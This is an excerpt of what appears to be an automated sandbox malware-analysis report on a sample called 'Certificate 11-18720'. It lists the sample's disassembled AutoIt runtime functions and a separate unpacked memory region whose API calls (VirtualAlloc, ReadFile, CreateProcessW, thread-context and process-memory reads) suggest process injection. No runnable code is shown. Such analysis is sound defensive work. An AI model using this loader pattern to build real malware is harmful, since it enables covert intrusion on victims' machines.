                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 2378138488-0
                                                                                    • Opcode ID: 4ce748d9c08a985fbc283beb1c2128150129a9136019886c1a510ba1fba8e406
                                                                                    • Instruction ID: 7bc05acc1b28801c1d9076ce38eb616e6f26f15d317256910911729285afde9c
                                                                                    • Opcode Fuzzy Hash: 4ce748d9c08a985fbc283beb1c2128150129a9136019886c1a510ba1fba8e406
                                                                                    • Instruction Fuzzy Hash: 65C16CB1D40119AFCF25DF95CC85EDEBBBDAF89310F1081AAF609E6181DB709A448F61

                                                                                    Control-flow Graph

                                                                                     Control-flow graph rendering omitted (legend: Executed / Not Executed). The graph covers basic blocks 5c3742-5c3845 and 631da3-631ea2 of the function whose APIs are listed below; besides those APIs, its edge list also shows calls to MoveWindow and SetFocus and to the internal functions 5c2ff6, 5de312, 604ddd, 5deb83, 6055bd, 5fa5f3, 5c3847, 5c390f and 5c4ffc.
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 005C37B3
                                                                                    • KillTimer.USER32(?,00000001), ref: 005C37DD
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005C3800
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005C380B
                                                                                    • CreatePopupMenu.USER32 ref: 005C381F
                                                                                    • PostQuitMessage.USER32(00000000), ref: 005C382E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                     • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: 6dfb82406fa26b76922598bc98104e34c2913e7332038f2d851d2a7ab5c8e7cb
                                                                                    • Instruction ID: 666d2094dbf9616b607d96473b598c1b013ef9538041f06917f730ccce993483
                                                                                    • Opcode Fuzzy Hash: 6dfb82406fa26b76922598bc98104e34c2913e7332038f2d851d2a7ab5c8e7cb
                                                                                    • Instruction Fuzzy Hash: 44413BF950414E6FDB146FA89C4EFBA3EDBFB46300F00961DFA029A191CB619F429761

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 005C3E79
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 005C3E88
                                                                                    • LoadIconW.USER32(00000063), ref: 005C3E9E
                                                                                    • LoadIconW.USER32(000000A4), ref: 005C3EB0
                                                                                    • LoadIconW.USER32(000000A2), ref: 005C3EC2
                                                                                      • Part of subcall function 005C4024: LoadImageW.USER32(005C0000,00000063,00000001,00000010,00000010,00000000), ref: 005C4048
                                                                                    • RegisterClassExW.USER32(?), ref: 005C3F30
                                                                                      • Part of subcall function 005C3F53: GetSysColorBrush.USER32(0000000F), ref: 005C3F86
                                                                                      • Part of subcall function 005C3F53: RegisterClassExW.USER32(00000030), ref: 005C3FB0
                                                                                      • Part of subcall function 005C3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005C3FC1
                                                                                      • Part of subcall function 005C3F53: InitCommonControlsEx.COMCTL32(?), ref: 005C3FDE
                                                                                      • Part of subcall function 005C3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005C3FEE
                                                                                      • Part of subcall function 005C3F53: LoadIconW.USER32(000000A9), ref: 005C4004
                                                                                      • Part of subcall function 005C3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005C4013
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: e4fcade3cd2cff484da2e6fe800fffcb6b279b9042d157a804999a89d35a2c39
                                                                                    • Instruction ID: 3b4fd54216c4c0dbacd769bd9cc31ad3fb598dfb0f166bf078c55732719ac2e7
                                                                                    • Opcode Fuzzy Hash: e4fcade3cd2cff484da2e6fe800fffcb6b279b9042d157a804999a89d35a2c39
                                                                                    • Instruction Fuzzy Hash: 032131B4D00304BFDB10DFA9EC49A99BFFAFB4A710F10621AE614AA3A0D77546458F91

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1021 f46608-f466b6 call f43fe8 1024 f466bd-f466e3 call f47518 CreateFileW 1021->1024 1027 f466e5 1024->1027 1028 f466ea-f466fa 1024->1028 1029 f46835-f46839 1027->1029 1035 f46701-f4671b VirtualAlloc 1028->1035 1036 f466fc 1028->1036 1031 f4687b-f4687e 1029->1031 1032 f4683b-f4683f 1029->1032 1037 f46881-f46888 1031->1037 1033 f46841-f46844 1032->1033 1034 f4684b-f4684f 1032->1034 1033->1034 1038 f46851-f4685b 1034->1038 1039 f4685f-f46863 1034->1039 1040 f46722-f46739 ReadFile 1035->1040 1041 f4671d 1035->1041 1036->1029 1042 f468dd-f468f2 1037->1042 1043 f4688a-f46895 1037->1043 1038->1039 1046 f46865-f4686f 1039->1046 1047 f46873 1039->1047 1048 f46740-f46780 VirtualAlloc 1040->1048 1049 f4673b 1040->1049 1041->1029 1044 f468f4-f468ff VirtualFree 1042->1044 1045 f46902-f4690a 1042->1045 1050 f46897 1043->1050 1051 f46899-f468a5 1043->1051 1044->1045 1046->1047 1047->1031 1052 f46787-f467a2 call f47768 1048->1052 1053 f46782 1048->1053 1049->1029 1050->1042 1054 f468a7-f468b7 1051->1054 1055 f468b9-f468c5 1051->1055 1061 f467ad-f467b7 1052->1061 1053->1029 1056 f468db 1054->1056 1057 f468c7-f468d0 1055->1057 1058 f468d2-f468d8 1055->1058 1056->1037 1057->1056 1058->1056 1062 f467b9-f467e8 call f47768 1061->1062 1063 f467ea-f467fe call f47578 1061->1063 1062->1061 1069 f46800 1063->1069 1070 f46802-f46806 1063->1070 1069->1029 1071 f46812-f46816 1070->1071 1072 f46808-f4680c CloseHandle 1070->1072 1073 f46826-f4682f 1071->1073 1074 f46818-f46823 VirtualFree 1071->1074 1072->1071 1073->1024 1073->1029 1074->1073
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F466D9
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F468FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                    • Instruction ID: 77ab07cf31b00a93bc767af8e3103d20878bc4f53a84df3eacfd68875c969503
                                                                                    • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                    • Instruction Fuzzy Hash: 97A10675E00209EBDB14CFA4C894BEEBBB5BF49314F208159E901BB280D7799A85DB61

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1130 5c49fb-5c4a25 call 5cbcce RegOpenKeyExW 1133 5c4a2b-5c4a2f 1130->1133 1134 6341cc-6341e3 RegQueryValueExW 1130->1134 1135 634246-63424f RegCloseKey 1134->1135 1136 6341e5-634222 call 5df4ea call 5c47b7 RegQueryValueExW 1134->1136 1141 634224-63423b call 5c6a63 1136->1141 1142 63423d-634245 call 5c47e2 1136->1142 1141->1142 1142->1135
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 005C4A1D
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006341DB
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0063421A
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00634249
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue$CloseOpen
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                    • API String ID: 1586453840-614718249
                                                                                    • Opcode ID: 12d56b723f3a70cdcc26df1b7d4cbad4dd0f52124bbb166683b8b822fc9e5151
                                                                                    • Instruction ID: d6107574c970af799230a80791a64bc3b6352d59a7ec36d496aee35659580d78
                                                                                    • Opcode Fuzzy Hash: 12d56b723f3a70cdcc26df1b7d4cbad4dd0f52124bbb166683b8b822fc9e5151
                                                                                    • Instruction Fuzzy Hash: 16116D75A00109BFEB14ABA4CD8AEFF7BADEF05744F001069B506E7191EA70AE06DB50

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1157 5c36b8-5c3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005C36E6
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005C3707
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,005C3AA3,?), ref: 005C371B
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,005C3AA3,?), ref: 005C3724
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: af96cd977b4dab5f15cb46376486748a14671960682a2a5948d871e489cd2e17
                                                                                    • Instruction ID: 507d1663e3cca76f485e12428bc00b0afe3127a584ca1dc2249ed09a4a8e3150
                                                                                    • Opcode Fuzzy Hash: af96cd977b4dab5f15cb46376486748a14671960682a2a5948d871e489cd2e17
                                                                                    • Instruction Fuzzy Hash: A3F0DA759402D47AE7315B57AC08E672E7FD7C7F60F01111ABA04AA1B0C9650896EBB1

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1262 f46398-f4650b call f43fe8 call f46288 CreateFileW 1269 f46512-f46522 1262->1269 1270 f4650d 1262->1270 1273 f46524 1269->1273 1274 f46529-f46543 VirtualAlloc 1269->1274 1271 f465c2-f465c7 1270->1271 1273->1271 1275 f46545 1274->1275 1276 f46547-f4655e ReadFile 1274->1276 1275->1271 1277 f46560 1276->1277 1278 f46562-f4659c call f462c8 call f45288 1276->1278 1277->1271 1283 f4659e-f465b3 call f46318 1278->1283 1284 f465b8-f465c0 ExitProcess 1278->1284 1283->1284 1284->1271
                                                                                    APIs
                                                                                      • Part of subcall function 00F46288: Sleep.KERNELBASE(000001F4), ref: 00F46299
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F464FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileSleep
                                                                                    • String ID: WGFCG22Y280QZELC5BHDJI
                                                                                    • API String ID: 2694422964-2246859810
                                                                                    • Opcode ID: 2cc154d5b071414317a25b8f645680162fe7c97080210d36ff2d9d2379e20b92
                                                                                    • Instruction ID: 6a248f3479ca8373fbcfd6affd94e20d61d8e46c7a9162981983509f751d2bdd
                                                                                    • Opcode Fuzzy Hash: 2cc154d5b071414317a25b8f645680162fe7c97080210d36ff2d9d2379e20b92
                                                                                    • Instruction Fuzzy Hash: 20619031E04248DBEF11DBA4D844BEEBB75AF19304F044199E648BB2C1D7BA0F45CBA6

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 005C5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00681148,?,005C61FF,?,00000000,00000001,00000000), ref: 005C5392
                                                                                      • Part of subcall function 005C49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 005C4A1D
                                                                                    • _wcscat.LIBCMT ref: 00632D80
                                                                                    • _wcscat.LIBCMT ref: 00632DB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileModuleNameOpen
                                                                                    • String ID: 8!h$\$\Include\
                                                                                    • API String ID: 3592542968-1035270185
                                                                                    • Opcode ID: 73fc54c01276072c2ddad87bc415855bdbca8087f1f7c8e2575b07d81c6413af
                                                                                    • Instruction ID: 9698b970a08e5118d85f20612d9350af2a128d9b928f5dbd0b6831368697334a
                                                                                    • Opcode Fuzzy Hash: 73fc54c01276072c2ddad87bc415855bdbca8087f1f7c8e2575b07d81c6413af
                                                                                    • Instruction Fuzzy Hash: 2B51A675404342AFC714EF95D9A999ABBF6FF99300F50162EF7C883261DB309A48CB51
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005C522F
                                                                                    • _wcscpy.LIBCMT ref: 005C5283
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 005C5293
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00633CB0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 1053898822-1585850449
                                                                                    • Opcode ID: 2f88febde1040836793fa049a48f2953ca8dd796a58cea82e380aa2b308336f0
                                                                                    • Instruction ID: d5f2994ab31a0dac80ab791da7c1b0361672c99552b8aa8762e7a7d44475d8b4
                                                                                    • Opcode Fuzzy Hash: 2f88febde1040836793fa049a48f2953ca8dd796a58cea82e380aa2b308336f0
                                                                                    • Instruction Fuzzy Hash: 9031AF71408741AED320EBE0DC4AFDA7BDCBB85310F00461EF5C996191EFB0A689CB96
                                                                                    APIs
                                                                                      • Part of subcall function 005C41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,005C39FE,?,00000001), ref: 005C41DB
                                                                                    • _free.LIBCMT ref: 006336B7
                                                                                    • _free.LIBCMT ref: 006336FE
                                                                                      • Part of subcall function 005CC833: __wsplitpath.LIBCMT ref: 005CC93E
                                                                                      • Part of subcall function 005CC833: _wcscpy.LIBCMT ref: 005CC953
                                                                                      • Part of subcall function 005CC833: _wcscat.LIBCMT ref: 005CC968
                                                                                      • Part of subcall function 005CC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 005CC978
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                    • API String ID: 805182592-1757145024
                                                                                    • Opcode ID: 2f1928ead3cadb2c8393fb5b33376af25ed6e393c4032dd561d00e9e3427db0f
                                                                                    • Instruction ID: 2ef7be111308f2cfc5502c10f150c4aa07bc68ed13a39a51e196ca550d345110
                                                                                    • Opcode Fuzzy Hash: 2f1928ead3cadb2c8393fb5b33376af25ed6e393c4032dd561d00e9e3427db0f
                                                                                    • Instruction Fuzzy Hash: F9913B71910229AFCF14EFA4CC56DEEBBB5BF49310F14442AF816AB391DB309A55CB90
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00633725
                                                                                    • GetOpenFileNameW.COMDLG32 ref: 0063376F
                                                                                      • Part of subcall function 005C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C53B1,?,?,005C61FF,?,00000000,00000001,00000000), ref: 005C662F
                                                                                      • Part of subcall function 005C40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005C40C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                    • String ID: X$t3g
                                                                                    • API String ID: 3777226403-2505316921
                                                                                    • Opcode ID: 5b6c40bf2ee39a069b5bcf2a37044e9a2369518671987f33b3ce066ab7b804cb
                                                                                    • Instruction ID: eba94c8ed0ec97e560199c525118dbd57ede0988fab8968748d9bc55cd4b6d37
                                                                                    • Opcode Fuzzy Hash: 5b6c40bf2ee39a069b5bcf2a37044e9a2369518671987f33b3ce066ab7b804cb
                                                                                    • Instruction Fuzzy Hash: 72218471A101989FCB119FD4C849BDE7FF9AF89304F008059E545AB241DBB45A89CF65
                                                                                    APIs
                                                                                    • __getstream.LIBCMT ref: 005E34FE
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 005E3539
                                                                                    • __wopenfile.LIBCMT ref: 005E3549
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                    • String ID: <G
                                                                                    • API String ID: 1820251861-2138716496
                                                                                    • Opcode ID: 0910855d8102429ad43b44581be69bacece48fcd3510f6c85a861b1059a1614e
                                                                                    • Instruction ID: 3921282f4cbcea5b092ed4c538d3c1ce2f3a59b6c6512640a00372c51bc566cb
                                                                                    • Opcode Fuzzy Hash: 0910855d8102429ad43b44581be69bacece48fcd3510f6c85a861b1059a1614e
                                                                                    • Instruction Fuzzy Hash: 2911EB71900347DADB19BF738C4A66E3FE4BF85350F158925E459DB2C1EB30CA019761
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005DD28B,SwapMouseButtons,00000004,?), ref: 005DD2BC
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005DD28B,SwapMouseButtons,00000004,?,?,?,?,005DC865), ref: 005DD2DD
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,005DD28B,SwapMouseButtons,00000004,?,?,?,?,005DC865), ref: 005DD2FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: 9efc41755067ddf8bc4b773561de95496a1cdb74b657202df5f624cbfbb8ca53
                                                                                    • Instruction ID: 38bd75ef635335855e2e499fb54bb2e38a112d77db3ed7af23733562456c8086
                                                                                    • Opcode Fuzzy Hash: 9efc41755067ddf8bc4b773561de95496a1cdb74b657202df5f624cbfbb8ca53
                                                                                    • Instruction Fuzzy Hash: 97113979A11208BFDB208FA8CC84EEF7BB8FF45744F10486AE805D7210E631AE419B60
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F45A43
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F45AD9
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F45AFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                    • Instruction ID: 22ec2b74e73b12799654807e43be5b49e39af5df7ec0bd9cf60977219d3a436f
                                                                                    • Opcode Fuzzy Hash: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                    • Instruction Fuzzy Hash: 91622930E146189BEB24DFA4CC40BDEB772EF58700F1091A9D50DEB291E77A9E80DB59
                                                                                    APIs
                                                                                      • Part of subcall function 005C4517: _fseek.LIBCMT ref: 005C452F
                                                                                      • Part of subcall function 0060C56D: _wcscmp.LIBCMT ref: 0060C65D
                                                                                      • Part of subcall function 0060C56D: _wcscmp.LIBCMT ref: 0060C670
                                                                                    • _free.LIBCMT ref: 0060C4DD
                                                                                    • _free.LIBCMT ref: 0060C4E4
                                                                                    • _free.LIBCMT ref: 0060C54F
                                                                                      • Part of subcall function 005E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,005E7A85), ref: 005E1CB1
                                                                                      • Part of subcall function 005E1C9D: GetLastError.KERNEL32(00000000,?,005E7A85), ref: 005E1CC3
                                                                                    • _free.LIBCMT ref: 0060C557
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
